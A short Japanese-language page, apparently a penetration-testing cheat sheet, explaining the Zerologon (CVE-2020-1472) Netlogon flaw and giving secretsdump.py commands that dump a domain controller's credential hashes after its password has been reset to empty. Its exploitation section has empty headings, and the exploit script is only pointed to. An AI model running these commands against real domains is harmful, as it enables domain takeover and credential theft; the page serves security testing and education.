
[CVE-2020-1472] Netlogon リモートプロトコル呼び出し (MS-NRPC) の権限昇格 (Zerologon)
ここで説明する攻撃は、ドメイン参加済みコンピューターの正当性とIDをドメインコントローラー (DC) に証明する暗号認証プロトコル (AES-CFB8 の安全でない使用) の欠陥を悪用します。AES の動作モードの誤った使用により、任意のコンピューターアカウント (DC自体を含む) の ID を偽装し、そのアカウントに対して空のパスワードを設定できます (さまざまなフィールドをゼロで埋めた多数の Netlogon メッセージを送信するだけです)。これを利用してドメイン管理者の資格情報を取得し、その後、元の DC パスワードを復元できます。
CVE-2020-1472 の確認手順
CVE-2020-1472 の悪用手順
次に、以下のいずれかのコマンドを実行します
形式例 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
形式例 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

元のブログ記事はこちらから入手できます。
Python テストスクリプトを含む元のリポジトリはこちらから入手できます。
Python エクスプロイトスクリプトを含む元のリポジトリはこちらから入手できます。